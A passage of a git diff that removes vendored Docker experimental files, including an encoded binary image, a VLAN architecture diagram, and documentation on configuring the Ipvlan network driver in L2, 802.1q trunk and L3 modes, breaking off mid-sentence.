z9GDG9m<-M;fjk$%Cl@>3CP12p>Ao!x1_3XZ3rz-GElQq?0Qr90d=yA=Wa%sKj}F7q zJihYFqAF&;mc-Ec^5*&K9;xYmf3hJEZzq+I@h}a@?Y6UGBXe{T#6W;h69ym*1Kohy z3;-s#kWbPX(^E^N3Z!&o`Fexc)vKuMGStCLR%G&o03Jqk1Jx!#ylF!T(c3#qqynUT zWbNJexSfTO>k^uhBN(ylVOFhVYX9SGpOn7wK_q??`#P?4w&03XisE*H*qa{a4pcJtn z8Uy1#0VKhTx z2w7K=>YXv&Q^zw466DoTzpB@Iez(0t8rSiDQPn03bg8z1_l*E3q$^f zuJtl72p9oTAs_@)nUER=2`CC2kkILpnpKWvGIBL+&kH8_BzL{)-vm#Mn8SuH)BgOsx9J8FSKnpb*HVkvZ>aS$m`Zx zUs}Bqy36cst+nCNiulf@`-iT-_zrIPFe3ymVf*MdJREx^=0jTDSlh&{wrpJl8kiZt zS`lkwDqXD17+YbA`t~26gOQmFcJ2wGam#oWh}^dQ(CThsQ5QzL z-zHBQ{{R!e|I0US^t-Pi7hkY5FNC;#x^=?!ihGFHRz%ZU$C}l_b#mPeMw{3+FO2G> z?yoH`txUL@h_`DXM7ELs^s}GLq%4S#gAkNj9#Vd7S#4CyY;tX6Aln9PGu^DUEXFpM z8rOwPkhHfiX(-lF`wX(y84-dK0}@T0Kkt=D9WqGvXb#v3Mbfejz@lacXV|`Z$z!IqJ zCkt_ZV+Ftx%PR{o)epg-P1h)$!GpEUbW)GpvMRS$RMTA{0F%Ff>#QHIhQI-PBm^SF z(c>bE+bOk7n`jm4u{LckJEnDCP04%twSgTITV4mMxK$IqD_%z5J3;_fC4Yt~`o{tno_9=|xPZQH?g-IACfLXBf|KJKa^}0eKR8(kv@M=U zZHyo0@IxhGAYz@FRm6g93^Orkor%n=>_(YY&vlQygAfh-D0G)MoRqTmsmJIIuZ>}G z&$DLGxyhqOWeLj0!I-?tSZKhB=}9^vd{;;&c=QA&h_ey0r%@Ie-EisZL`G#_MLG1W zk$F#&K8%bJ!3bR%qE(KR!T6pK#?x=ylzrD8cVg&->;nWEB0eIR_>@qL2{h!!?+DgW zSi;lrWIplG=dl&!6(J~qvDWEA9E>82e2fV3C?OR2jzAoYhOi+NBV}MMs_cloSA<9y zYyE7ls2^YyReKo4*ufluAO|DFcU&Z`#{p(~fZZ3uKK_rp?c#BSJX#IeZ@})@z`Ngf z4VL?d+l5FxirqZKdsT@1?vu~nIVEM?haG6gFgFjum?aqB7s5FE_6dBw!n}|J48IPx z-;glbfFI}|enklJKmO`{xG3x7QP%l)ayS-p+z8?bxuXg14lzXT@5W;xFP=Y#%jD*Z z`s-i>VB~+n2rTXkLE@L+K7-r*&DRj`xM75LFuH$)@6agrj)dHN{q>h{f4~b;*5yKo 
zD$BCn2&NJQkK)#DkayG$Mcs#=nOQ>}d4Ld-v_MO$M)lNX{ML@-bucGHAfW;FTgY0o z5pvY%;9z~&G_G3EN|!wtKWYadsH*ck`Uqx-kC?LNh1539b6>6Mj1yFq(T%})Mu<|P z{`EUYHRLE|9W}JFd7d*l)hk43sBL6@G9yF%37Gi3@<4s%0On`_s~iji3={7}A&|38q}?Vd-wb!0}!%sgZV z+r0|jGtnNlTVP6n=AI!lLS||Rz6T?BVPp?;Yj#V7PZjd0H3W0nV^Rf~o04&s`54v_ zHButd0Amluc|zcMrgBDb7>wkS2;p(ykxFF(UIkT|fcPVF2MAyTh{yv>!laRTLotyF zeuI$NQ5F(`AVlU29MCXe7+~Apgxd|+F^Ov8ydfCL9^)AyXO6O#c(svBx7`GX>7u6|jY|hei>38Q=$I%hfeGuXtIo&g*N_WO z13DH$kELQxwNY?h2*F{rKTopQqi*YCyhCe()F#LUqs~3}6 zjwl3}6QXVPo*4?W2H)4q^UGeRE!tP=+(ymUfF5W)#pAOs_bBTtn&tSIemaA;j$wgb|m^7D4p=tz$bO{@O+4zae4Wbc{Z{sAHbK z6oPmKLR`<}2M~S1LCD&0SsGDx>#m`1H9}rn)IrE_W$JEZ8=is?Hj=6^aEt~wRBDP? zvp?=qmSAWAAr(`aJ@1D1v?@j>9aG%o!&S+KvRp2vHwZbJ7|suS9~dDXDlO*qqF7Z$ z&$H!*uR0Heph_=_BrY14>H`~>izRf=9c}pBl=ablAzT#;TeXI(#mH6XYN|nQ1BR}T zfH`#RgKeP?BTMlmLQ+@Mp+@?xMQqvgxJ%)P>fHvIs$8YZA|LFi0k$H%?)+0z*5ghL zNz5<_rSw86h-f^*8XPtPlS(zTl9;ImF;+E=l(&>HLC&oqKe{6Xvj*cZmOfCaXnX)d zlMFzOA2!vN*@Q8`1i%=%WMYT`fJv+bj~n7Q0{(|WH3WLAU;_j&-5Im2X&g+91kVV0 z+*3&p6GOV2BjMdNcKeu;m+Poo5WJs0kq6AwH;0KK-odD&Y=Ou%x`!Q@TNpimV)(~{ zkS)NYcVN5TY+Y>+S(YS@f2L{P0tT+*V)Ga9HQ_LfqN!?qusrX(X*r5dtS$ zD|9goskbZyzBVK$mu@zSBX!Cs3ob`^io;7`45Be(^FrWq1VJu^RZ;qug}|km2_nS9 z4~-5=(GcY-n~xBev;H0s5>fw;k1R0td%A}*5!9TEjHxNzhG#gHk4F7+NdB$EZ13&ja^DP#;8x|Kqq z(Em`s%Tbk(_}V+{XCnkgJX=rC_wIC`E@px&4?zNMP@#nCjVNTpJkiL!<~T*A+aXZo zTDQ4383P$7Aae->nKA}R zGRJ5y&`bMQJD<)1$w-qVYjp@bvU@vJ#1q2>NE;;^vC>XK;F0s~vmi3)0rejf62LN+#(>R&cVij^XA*hZv8HL|%HM%_YMOKwh~8fk!^_ybUBvsMb!0K$ZU1B!sM$ zQDVZc>I7MB6)s?kqZ^bEQ$Hk$xxK~7KL~;j`)NL4-eeSHG02vtEL-rDrg!Cl29Y6Y z3$>=f#cmZtp3^u4?1T%1U#B4Gj=cX$2O)H{HjTTaOB!|iO0V`yHi$z|m>8K`K~`Jz z*?DAlUa7k9MXfX!Cj8Qef^2rNw^QU=2a#3xWDRo(g3I~)9akp-WWwk{8s-)x{GNJ; z7jO4I+;V?ZNQgt3P`5*{EaAboo5KLI`=rerg4hRPq|?tKWLhXihAoSz-!ve1?0w83 zSfgn4S`c3-gc9?uizOYyPLW?R%vnhGE%bam8jqg29fD^y={AZpZ?Ys83q78iY;EfS?M|BRfGh@G_UC1g zb??mX*$>Uef=cyUd9hOwi>+zg%0lFk>Mu#GP<7-%*>V85yq+h!)3?l=)M zUnEu4drySu%X^c*jvXBTIP!X7I)kV8>bcx*y|Ul$=j9or{J6B^l3}BoBh?N1 
zt9^qm(qrJcEB#KFEHc=9ulg(xWDiAsoK|E$eo}pH_IQTB>@C?yk ze9&ac!W?gALf5vD^?Dgt@O%Ew=Kj>_ zO>74y+j#Hz!c+H`KF#cV5Td?V%ZixE7NgmS^KdhwG~BWUQijH6nvbY8W>vycdX1ph zqq9^x{>eEVpNXKHjnHqIUz#Dnqi0Ber3HcRSysQ>agi-SfShq(23J;p)s+TM7~J6K zr7IfkU=0Bwm%GV(+OyX*40&evc*y6wFxzpybGR_oI80V%uicPZg@hE()JY=_&xzFR z)QY1K-IDa=JU)qrxbDeVW(b19u_=Q_JUUOU^9DZ|BB?e*nlETh(lNBZ;3b&lm#nr6 zyj%rVNB7+BAn0EN?u95#fxFV&7lQ!|RtE;J?TWMs^uq~x5>iSn>tk*0Pi=lVv3gS{ z$-;Fq-__>trqg)7LFgNA?*mgcNlk%Wj~ zHj9R%go2QqE$Ei9Fkd7maWsSX7bB$G?_$EO1(r8JJsJ$IK7fe25Bp;fvYgt}HQj|LYoFf|;(X-udAOS-bH4{g;eWM_`x8=CbO^mhZDNg> zUW1TE68^w8`37Bn=U-00Pr8H#cB%uRhc6>QOVRGm)%qH}mElQSux#K+$qDs~Q8X{_z zHI7qgcNm)NhL3a3&s#K3>6ma3LboDC2!`?4ibph$sdX&~X`~3Updn!%^6SPIY6wsc zA)05k2ikX1wN*j{uG^NPz7i!1e*J^nx2)CSgcx;BIj3P}gcQ;}-`!Aj4BngeEZ-3> ze`kRZKDXBvME$^n2j`JaDZQ1L%ML?ZdZNY)G5TW^X zqjd(6Z;j(TV&aSl8dB0s9Z*Xi6+i8j%~3nhG_BojN_gRdrG7`F!ljv6*KP=*?s&k!OrWbXkZ`r@c2-+M7| z0HTow*;ft~rx-T3Z%cWWr5}|EP5YD~PygoF1y@o6Ewua29N5a8**Mogqg8ITpQ_4ax5aWzDqeeq4nORplYL5Ny2IGsriREA`R@A?7bn)*U!R^HfBQT2&7NOQ zga(uVsXNZA+Cu z*T<*LW3?V8zFG6qcP6EzNZoOkul{h_#5Gd?j)c|QzkT~vIrtxKcWA>f5JLeJnVsZP zOP20v3$s9FDd3lQh3*iAhX&sQ9U;SYfmTtXD1mMK;E_+hb?zm0wD|oPu>RF>-_(tOV={cR5ofFR&WGK(>9ql*aQ&^`|7krmK=~9 zzE}Jwn4&B+(lrB(`22bx$yqI=jt&87kcSmd$Y@N~mjiHg$=)uz!j18PPf7EDL4FL7 z?;xH-^6|!i#LM30#2`6+Bk}KmKteEw_@^w|CFKYJI6)D9UYZlwJYy%K&XXIijOzhz zuDcdc;6^~GvPZ7S(JpCprWz~1X=$!4u+*?BR&Lk@+3pI8i2Ceg9#Je(dpyIo6x7dyNFsWU2^M(!qFa4!F$RI8R4F81K5n#3W(33H$Gc0l@`T)6@VFgfUA5jFD05 zBa8^65s)0M^&&c_MTlb*!Hl=+Qw|Y8T~bxO8{)A%C}L+;h>ek?#p3(tA)v#H>5k<^ zn2fC8W>uk>AfPxDx0rtMb%c1-PFr0B6UPghW%U`8nPU9AUq?SFsel4+o$*Kvki>As zT$dwkJ|A#wJ^>F}cPvX)hjulh7{{KNF?Nk~F{VroHOt>IB3=Z77u64xO^Yf6jFPnw zYhH*8)ldWiKH_YEApi+9XvoN6?AYjr#X;^_ZYv}=3kY3&x<4FH4kOmKv@W#; zgVBQP%0xUg!xx*`2pg^~QvwYxJnizt6$rk2Isn>`T^ZSmfMr<`=u#)bjL68Y&11us zPr8WbIeOo7+vP4bfJea({^G6Qbg`_+*kF1X+3uVbB98u4orgP*i~5$E)BTKVa~Z|O zxb4npVcjlwF~mymyED2Ej%08I5Nx>wH>{&csFatY;%teBubvcMj z42_vIO7LE$RBu-RtNZ?Y+}r$-g7d_0!-y6dW@Mqf&xM{>GqUQ)t|^Qw1138Cr7nBt<`c&eqU 
zs^vqzn3rGdZ)JBw)Y2YP;JGzR>xCcJ^dWOIpd6j+-Rog`l+{k%lBBzwsaHRa(;nOpJM5>qO^kx&{z@%+d3;;QbF;HfWwmQjb5f!b4r^WwdO^Z|G9D zotCuhcN7=0roL;Gy5c=+&5AH`(%=}N>p@cod7hx=Ys)$~$__6obGP5`-#j3aPn**1 zZL@yg402|$>2>b;8c?4ZQZZ+ga?{ZYxvn8B04_rMdS%zYZ_75CN}Fc_cQM zgSO=VuE{f2^ilUIYUzWb#!NrphOrgy||^s6Hazo4yjHXFQO zQ`J*{Q>B!H3<=~$Hu`7=KQ4I}nq;M({4fv^B^)j7Lz2_EB_YH#Ow+1sJtocQJbOplT{AlSKTSMw!3Ob=ev4#e|xi0NF` zvmoeJ^y8hkJ^Z5l7YGPGJB?_wb5VYCygYmxiOrgIKnQX`*8*LDa9r(ULQ6Y*PSYP7 zr4{k}A0F!u3tC$0aKH7$bk@_Al;Pi-5Lrtiy%JUL*}y4 z*;?N@^zPrgkXG71bd8KmNYfjLn0}=P;$fG5Om_z2$yUJ%f8TZPblYXWwFe8>YV7j@ z;qkf^wF-N|-@49W^}jx}(zE%&F9+vUx40~vd=S(9brrAcAtH`CcyVF|6v1A`8|7CI zcJN(2XfN0D{DPiISC(#5LKv@^e%0tXOTDHSyeM_WhDz}lTHjswf-^n3tG#*4gG!*TFn)sLmbB==mQtw^)rZX{Ni%R{ij)U-IOdc~AEnor^t> zO0Q7*w0?XnJ$AIy5TQlWf1(AAZfkkyK^XCG8+g5^?K-8$PgbJu%MnKHmu*P4I77aB zf8#v_FY1ycJw^+fBn`th5IrN^Z%g}SNm>bODu+06S&GDl6tzl{WCh!LN2)a6Nmq?7 zMFrKTJX+Kun$z~Rt+X$e2awYR?O3Z6)$pzwZd&{1Rp}Y#(TwDIQWbsbE$Q7EwcLA@ z4nL}LIbY5<(|#*mY3oC+#}N+Cck;T<9=>&L1)h_mJZ+Y|@?|@n*HkC1YtBrXONm4EyG^)X(dz2moFPz*g471s}aJt z)R($f=ta$PK7Gj%yzoP1QPTAupOYlB`$?DYz{2FIW`0`@6$d;j<#QVlhH1J-nu`$zj4#AERtcrQE(WyQ*|C=Cshxz z;$qu%QYitu3SssX_7~!el5(k0Tva%bmhFg;jLqJ(9h)P>o>hn~7>Zz|d}Lqw*s)PY z;XvGW(g6mkdcCgjG_$&@$i_uQ$k@bCcxN`n!wvLs`;p?Zw|3*=%56gryv(i&)Rqy- ztX2dH{K&BR_G$<|6CT*HUBTrMLlqIjju1y&q4c;|&y@QY_4qhLzygt7>^!RQvW#%% zQANfa8S7#Ofh|NGT(C)FdsQKhLNX}@R-(NcQ5Zl?Kpznfrd+QG*eF(P*-6QWL+#l* zm|V5pjLQQ&!bU*CuFJCQI_}L+>X=dtxZ%cL*;tF=gX12;$$K>cF#>mrp~J*6MIaTA zvKAT`W>j(@VFba9&CELigpFxa3Wg|+1yI6AFvj#^n>cpIw3+b{CNzcx4URR)gqMgS zjwcEH*Z^+nfk@kCB;r^yu@LK{v9XC89Mj1x(8MSuD1nY)hz(;H7^~rtV+2U}M4dqc z5jG8;Ppp9L__}#S6BFg*zaF}|+DW|f2~IK$>KHr#8H2~d8j$>@>2sinm8hz60QGx_7jT8T@< zWKd#xN+ul+k+>uUIycOa>13x@GBQFt;>bK1OT`b|2$Ud@u>#4+EEvLcehKG~hU2sX zaUiGGSQppbM0wi$p+ChofsPOnfW8(rcG8p)y{2q1pi`15OlhV;t_3)8FakJ<0K(VZ zu;~&c$RxwZ=>-l5EC(VP0Z2oD4=fG^-pvC-SPmv%9V~}&l9d=}Rv?IT)tL41ND5)Q zf?^ep#}@%*=?vo-+kFm;h2s$6Nor5NY?$F#4hC`aWrTUu?(YKV)BM>2|AXElX-UBI%fzz(P&?7DWH+{zAk0^+=^q=csanP&hp 
zwqk25VJ4N55wcg~mj{7`#R1cXttgNQFl1u}PO!nIOE?60!dB_6{Pnj*7h!oUN*`FV z(=dGshA_^g>h!@bwqugQrtFf|a<^y`%qC5pi#oq3^%;{8&aegK3gDDDDdMon8O6FS z6JnGsp*&!27?YsF4?VHHcG;3%5eUy+DSL@qrRLgmYFZQ^spgy z%)yt|8@*D57t@ZE$9F&`LU>Vyk$gB`L4zdY_(1x^z&^N@a6l^#GBk7KrKj@`^SndMF2GD|415J;%g(X9f+ca~j=ESFPuWv`SV8N9C5Z0b!(@ z9Wc#~x&f5q2tNBE#SV~*PoL2n2LvzZQFB#E^y5zb-3LU7aj#xX56)m6^7EH19fG=Uh0S!ZG^EQ9U%U=#p3<<|dO$cjrxMiK z>b@R`KW*H%`1WvJg|*X$c6qmGMF=vaFE*b4zCzAA6%F2zoqX`gN<9M36Fm^iCF|>F;I~fLlr}g*nkU_M_PN-w%3f(45Iuqn z+MqZ6cj`ROSyX&c>x(bub_U|T1M%qD*`LYGkj`A5?L=Sg_&Dd)f0-4}m+gedN-{rcU8mvc7XRC+xSh?HccMd8{Jpo% zYFiMHLN{D|jZZ$DOJ247^>-Wuqgd8n-yQI1Vv5lLqH(g-uMVT(ft>%S96*g6yKnqzZG-kLnxIz2b*^wAi%5C z%)D2P5c+aYl@4%I`i@d@ea$Lod$iOmtYs$|5{U)#8NKNq!s^LzSUr3b7S#O%dJjqv z&(2n-=$*MYm05X~>_b;-^mT>3}DA@$=$t9FT9%J->Os^yg4a4`$40 z5i+DtYbD)pl`5FN-o?2cMe{L_&(;Rb@}Te;fBbATo(^zajcIDZ(ux7KG02cSS}3)3 z5T$dLklD1Ny@z56G9+BA&JJ#MWUWsh+=Hw_Tx%HuvhjP5oOdce2_H?RI>-%L+ACHh z`_R&sw~V8=7kTdI@5IgJ^24SUXGn*Z15vBgRJ`bgh|osXWOdoMwqlpeAO*H&-h2ZUgz$7-dKKcP z4z6_RQWOh&TMZR`DX9>Ug|$@iDGU#8^b_tn1SEciwr!sMVni|m64=KOpv$O?Eepx0 zz++hvsI15WZ@2;@P<#%F6|e)^29tLMf?URfO+AnWjAU1kc|j%^cpR2NMkcb$6Ov(W z44GtH0RRBOtYPLLwvLV1499FDLynL7g6)pLH5)^YjWFmS3GfIw%P20#MA;!h23H6% zn8;ujfGacW&|`B>U}wfZM`1w7n4oH~IRGQZ25_ARDQ6D?0yMZmBR8rBoO!;>>&k9p~*R9^rlY`hu8=1$p;28iH8sYDPUmM!e{(rC5pL;cFYDn z*1#TNMU)XE6R}7l8vEnO*iB-MFcHGV;$&imv;dDI<-lNT@UeyG1X$%)cCYFo!pe9``VxW|5_GAWXZHCAqhIxjC$9KOUX4J zOgdv?8k7+^k{byTOh$uap^4ei-*{;1o12J_`BOc(rXmPW&?L&&VNVzAI?Sm-)=p?{ z!u&tAvx!PvmAGytZl;!!YvOa-Pe_8OBIW*9EbMrTEGUr5^Hzux(A1|L7zLUFaV};$ zmMr*l2n?v@nKjw3*P-+n5Cc@D^DJU}z~t zJ1`0?4FT-iAr1f_2td)o#{F+>V$PyTF}xS4e~d(w-H&0(j3&$tSqIkk0iiCo-SqvCT7M#14aQe6999SUnert*{%Qp N002ovPDHLkV1f$s#LfT! 
diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg deleted file mode 100644 index 96cd21d52f..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg +++ /dev/null @@ -1 +0,0 @@ -DockerHost:Frontend,Backend &CreditCardAppTiersareIsolatedbutcanstillcommunicateinsideinterfaceoranyotherDockerhostsusingtheparentVLANID802.1QTrunk -canbeasingleEthernetlinkorMultipleBondedEthernetlinksInterfaceeth0Container(s)Eth010.1.20.0/24Parent:eth0.20VLANID:20CreditCardsBackendContainer(s)Eth010.1.30.0/24Container(s)Eth010.1.10.0/24FrontendGateway10.1.20.1andothercontainersonthesameVLAN/subnetGateway10.1.10.1andothercontainersonthesameVLAN/subnetGateway10.1.30.1andothercontainersonthesameVLAN/subnet:Parenteth0.10VLANID:10Parent:eth0.30VLAN:30NetworkotherDockerHosts \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md deleted file mode 100644 index caec6d6c6b..0000000000 --- a/vendor/github.com/docker/docker/experimental/vlan-networks.md +++ /dev/null @@ -1,471 +0,0 @@ -# Ipvlan Network Driver - -### Getting Started - -The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver. - -Ipvlan is a new twist on the tried and true network virtualization technique. 
The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network. - -Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios. - -### Pre-Requisites - -- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental) - -- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples. - -- Kernel requirements: - - - To check your current kernel version, use `uname -r` to display your kernel version - - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy) - -### Ipvlan L2 Mode Example Usage - -The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`. 
- -![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png) - -The parent interface in the next example `-o parent=eth0` is configured as followed: - -``` -ip addr show eth0 -3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 - inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 -``` - -Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option. - -Create the ipvlan network and run a container attaching to it: - -``` -# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) -docker network create -d ipvlan \ - --subnet=192.168.1.0/24 \ - --gateway=192.168.1.1 \ - -o ipvlan_mode=l2 \ - -o parent=eth0 db_net - -# Start a container on the db_net network -docker run --net=db_net -it --rm alpine /bin/sh - -# NOTE: the containers can NOT ping the underlying host interfaces as -# they are intentionally filtered by Linux for additional isolation. -``` - -The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`. - -To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode. - -![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png) - -The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`. 
- -``` -# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) -docker network create -d ipvlan \ - --subnet=192.168.1.0/24 \ - -o parent=eth0 db_net_ipv - -# Start a container with an explicit name in daemon mode -docker run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh - -# Start a second container and ping using the container name -# to see the docker included name resolution functionality -docker run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh -ping -c 4 ipv1 - -# NOTE: the containers can NOT ping the underlying host interfaces as -# they are intentionally filtered by Linux for additional isolation. -``` - -The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely. 
- -The following two `docker network create` examples result in identical networks that you can attach container to: - -``` -# Empty '-o parent=' creates an isolated network -docker network create -d ipvlan \ - --subnet=192.168.10.0/24 isolated1 - -# Explicit '--internal' flag is the same: -docker network create -d ipvlan \ - --subnet=192.168.11.0/24 --internal isolated2 - -# Even the '--subnet=' can be left empty and the default -# IPAM subnet of 172.18.0.0/16 will be assigned -docker network create -d ipvlan isolated3 - -docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh -docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh -docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh - -# To attach to any use `docker exec` and start a shell -docker exec -it cid1 /bin/sh -docker exec -it cid2 /bin/sh -docker exec -it cid3 /bin/sh -``` - -### Ipvlan 802.1q Trunk L2 Mode Example Usage - -Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations. - -Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. 
VLANs or the equivalent VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic. - -![Docker VLANs in Depth](images/vlans-deeper-look.png) - -The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0. - -For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. - -The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user. - -For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`. - -The example creates the vlan tagged networks and then starts two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host. - -**Vlan ID 20** - -In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink. 
- -``` -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.20.0/24 \ - --gateway=192.168.20.1 \ - -o parent=eth0.20 ipvlan20 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh -docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh -``` - -**Vlan ID 30** - -In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example. - -``` -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged. -docker network create -d ipvlan \ - --subnet=192.168.30.0/24 \ - --gateway=192.168.30.1 \ - -o parent=eth0.30 \ - -o ipvlan_mode=l2 ipvlan30 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh -docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh -``` - -The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network. - -``` -$ ip route - default via 192.168.30.1 dev eth0 - 192.168.30.0/24 dev eth0 src 192.168.30.2 -``` - -Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. 
- -Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI). - -``` -docker network create -d ipvlan \ - --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \ - --gateway=192.168.114.254 --gateway=192.168.116.254 \ - -o parent=eth0.114 \ - -o ipvlan_mode=l2 ipvlan114 - -docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh -docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh -``` - -A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network. - -An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. 
Example mappings from NetOps to Docker network commands are as follows: - -- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1 - - - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` - -- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1 - - - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` - -- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1 - - - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` - -### IPVlan L3 Mode Example - -IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples. - -![Docker Ipvlan L2 Mode](images/ipvlan-l3.png) - -Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Port Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs 